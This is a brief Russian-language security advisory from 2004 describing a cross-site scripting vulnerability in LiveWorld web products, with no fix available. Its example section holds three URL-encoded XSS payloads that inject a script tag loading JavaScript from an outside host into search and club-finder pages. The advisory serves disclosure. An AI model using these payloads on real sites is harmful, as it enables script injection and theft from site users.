Межсайтовый скриптинг в LiveWorld
| Дата публикации: | 29.08.2004 |
| Всего просмотров: | 1120 |
| Опасность: | Низкая |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Уязвимые версии: LiveWorld
Описание: Уязвимость обнаружена в нескольких программах от LiveWorld. Удаленный пользователь может выполнить XSS нападение. Пример/Эксплоит: http://[target]/search.jsp?q=%22%3E%3Cscript+src%3D %22http%3A%2F%2Fstuff.gulftech.org%2Ffoobar.js%22%3E%3C%2Fscript %3E%3C%21--%3C%21-- http:/ /[target]/findclub!execute.jspa?q=%22%3E%3Cscript+s rc%3D%22http%3A%2F%2Fstuff.gulftech.org%2Ffoobar.js%22%3E%3C%2Fs cript%3E%3C%21--%3C%21-- http://[target]/search! execute.jspa?q=%22%3E%3Cscript+src% 3D%22http%3A%2F%2Fstuff.gulftech.org%2Ffoobar.js%22%3E%3C%2Fscri pt%3E%3C%21--%3C%21-- URL производителя:http://www.liveworld.com/products/index.html Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |